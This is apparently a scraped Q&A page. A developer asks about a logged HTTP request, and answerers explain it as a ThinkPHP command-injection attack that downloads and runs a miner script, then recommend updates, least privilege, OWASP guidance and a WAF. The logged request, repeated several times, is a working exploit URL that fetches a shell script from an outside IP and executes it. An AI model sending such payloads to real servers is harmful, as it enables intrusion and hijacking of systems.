Ggthjy

CREATE ASSEMBLY System.DirectoryServices.AccountManagement.dll without enabling TRUSTWORTHY

Does SQL Server 2017, including older versions, support 8k disk sector sizes?

How to prevent users from executing commands through browser URL

Difference between `vector<int> v;` and `vector<int> v = vector<int>();`

How to prevent cleaner from hanging my lock screen in Ubuntu 16.04

What is the wife of a henpecked husband called?

Advice for a new journal editor

How do Chazal know that the descendants of a Mamzer may never marry into the general populace?

Porting Linux to another platform requirements

Why publish a research paper when a blog post or a lecture slide can have more citation count than a journal paper?

Can I string the D&D Starter Set campaign into another module, keeping the same characters?

What is the purpose of easy combat scenarios that don't need resource expenditure?

One Half of Ten; A Riddle

How to deal with an incendiary email that was recalled

Can a person refuse a presidential pardon?

Why is mind meld hard for T'pol in Star Trek: Enterprise?

Can I write a book of my D&D game?

Can an insurance company drop you after receiving a bill and refusing to pay?

How to solve a large system of linear algebra?

Why would the Pakistan airspace closure cancel flights not headed to Pakistan itself?

Why do neural networks need so many training examples to perform?

what does しにみえてる mean?

Normalization for two bulk RNA-Seq samples to enable reliable fold-change estimation between genes

What are "industrial chops"?

How to prevent users from executing commands through browser URL

How to disable Firewire in OpenBSD/Linux to prevent attacks through Firewire?Executing arbitrary commands through iptables-restore inputTracking checkins from generic usersHow to prevent future attacks from Trojan.Agent.Linux.A?Unprivileged user sends commands to init (systemd), how could he get root?How to manually detect and remove Linux.BackDoor.FakeFile.1 from linux system through the command line?How to prevent documents from being stolen via Linux live CDHow to prevent Tails OS from accessing hard drive?From a security standpoint is there anything wrong with running repetitive putty commands from the command line?Prevent apps from having full access to user files

26

6

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux

share|improve this question

asked 20 hours ago

user3718908user3718908

23625

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  15
  

  
  
  
  
  
  

  
  
  Specifically, the attacker is targetting ThinkPHP installations that suffer from the remote-code-execution vulnerability documented here. A security update has been released by ThinkPHP. Keep an eye on the inventory of software that you have exposed to the internet, and keep an eye out for vulerabilities found in these packages. In short, stay up to date. The attackers are usually exploiting old versions found to be vulerable.
  
  – spender
  17 hours ago
  
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Are you 1) a developer or 2) a systems engineer / webmaster? Do you develop or run applications?
  
  – usr-local-ΕΨΗΕΛΩΝ
  11 hours ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  I am a developer.
  
  – user3718908
  10 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  Applications are immune to these attacks by default - you have to actively screw up in order for the attack to work.
  
  – immibis
  7 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  So if you're asking how to avoid this attack - unless you're running ThinkPHP, you're already not vulnerable. If you're asking how to avoid similar attacks on your own software - see the information linked by Soufiane.
  
  – immibis
  7 hours ago
  

  
  
  
  

 | 
show 1 more comment

26

6

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux

share|improve this question

asked 20 hours ago

user3718908user3718908

23625

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

• 
  
  
  

  
  15
  

  
  
  
  
  
  

  
  
  Specifically, the attacker is targetting ThinkPHP installations that suffer from the remote-code-execution vulnerability documented here. A security update has been released by ThinkPHP. Keep an eye on the inventory of software that you have exposed to the internet, and keep an eye out for vulerabilities found in these packages. In short, stay up to date. The attackers are usually exploiting old versions found to be vulerable.
  
  – spender
  17 hours ago
  
  
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Are you 1) a developer or 2) a systems engineer / webmaster? Do you develop or run applications?
  
  – usr-local-ΕΨΗΕΛΩΝ
  11 hours ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  I am a developer.
  
  – user3718908
  10 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  Applications are immune to these attacks by default - you have to actively screw up in order for the attack to work.
  
  – immibis
  7 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  So if you're asking how to avoid this attack - unless you're running ThinkPHP, you're already not vulnerable. If you're asking how to avoid similar attacks on your own software - see the information linked by Soufiane.
  
  – immibis
  7 hours ago
  

  
  
  
  

 | 
show 1 more comment

I have very little experience with security (Still learning) however was combing through my logs and I noticed the following request:

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

Now first of all this made no sense to me with the exception of chmod 777 which tells me someone was trying to change my file permissions.

My question is what kind of attack is this and what steps can I take to prevent it?

linux

share|improve this question

asked 20 hours ago

user3718908user3718908

23625

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://86.105.49.215/a.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 200 16684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

share|improve this question

asked 20 hours ago

user3718908user3718908

23625

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

share|improve this question

asked 20 hours ago

user3718908user3718908

23625

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

asked 20 hours ago

user3718908user3718908

23625

New contributor

user3718908 is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

asked 20 hours ago

user3718908user3718908

23625

2 Answers
2

active

oldest

votes

34

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.
  
  – JimmyJames
  7 hours ago
  

  
  
  
  

add a comment | 

15

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 19 hours ago

VeyfVeyf

1512

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

Your Answer

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "162"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});


}
});

user3718908 is a new contributor. Be nice, and check out our Code of Conduct.

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name

Email

Required, but never shown

StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f204459%2fhow-to-prevent-users-from-executing-commands-through-browser-url%23new-answer', 'question_page');
}
);

Post as a guest

Name

Email

Required, but never shown

34

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.
  
  – JimmyJames
  7 hours ago
  

  
  
  
  

add a comment | 

34

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  The easiest and maybe most important step from the first link is using 'least privilege'. Reducing the power of the application will blunt these kinds of attacks and many others.
  
  – JimmyJames
  7 hours ago
  

  
  
  
  

add a comment | 

It's a command injection attack in which :

the goal is execution of arbitrary commands on the host
operating system via a vulnerable application. Command injection
attacks are possible when an application passes unsafe user supplied
data (forms, cookies, HTTP headers etc.) to a system shell. In this
attack, the attacker-supplied operating system commands are usually
executed with the privileges of the vulnerable application. Command
injection attacks are possible largely due to insufficient input
validation.

There are many strategies to mitigate or to avoid this kind of attacks you can find somes here and have a look at this cheatsheet from OWASP.

share|improve this answer

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

share|improve this answer

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

answered 20 hours ago

Soufiane TahiriSoufiane Tahiri

1,971619

15

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 19 hours ago

VeyfVeyf

1512

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

15

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 19 hours ago

VeyfVeyf

1512

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

add a comment | 

As stated before, it's a command injection attack that attempts to download a .sh script, grant it permissions to run and then execute it.
The script in this case is a bitcoin miner.

The recommendations in the OWASP guide that Soufiane should be followed to ensure your web application is secure, but for an extra layer of security a Web Application Firewall can be used which will block requests like these before they reach your server process.

share|improve this answer

answered 19 hours ago

VeyfVeyf

1512

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

share|improve this answer

answered 19 hours ago

VeyfVeyf

1512

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

answered 19 hours ago

VeyfVeyf

1512

New contributor

Veyf is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.

answered 19 hours ago

VeyfVeyf

1512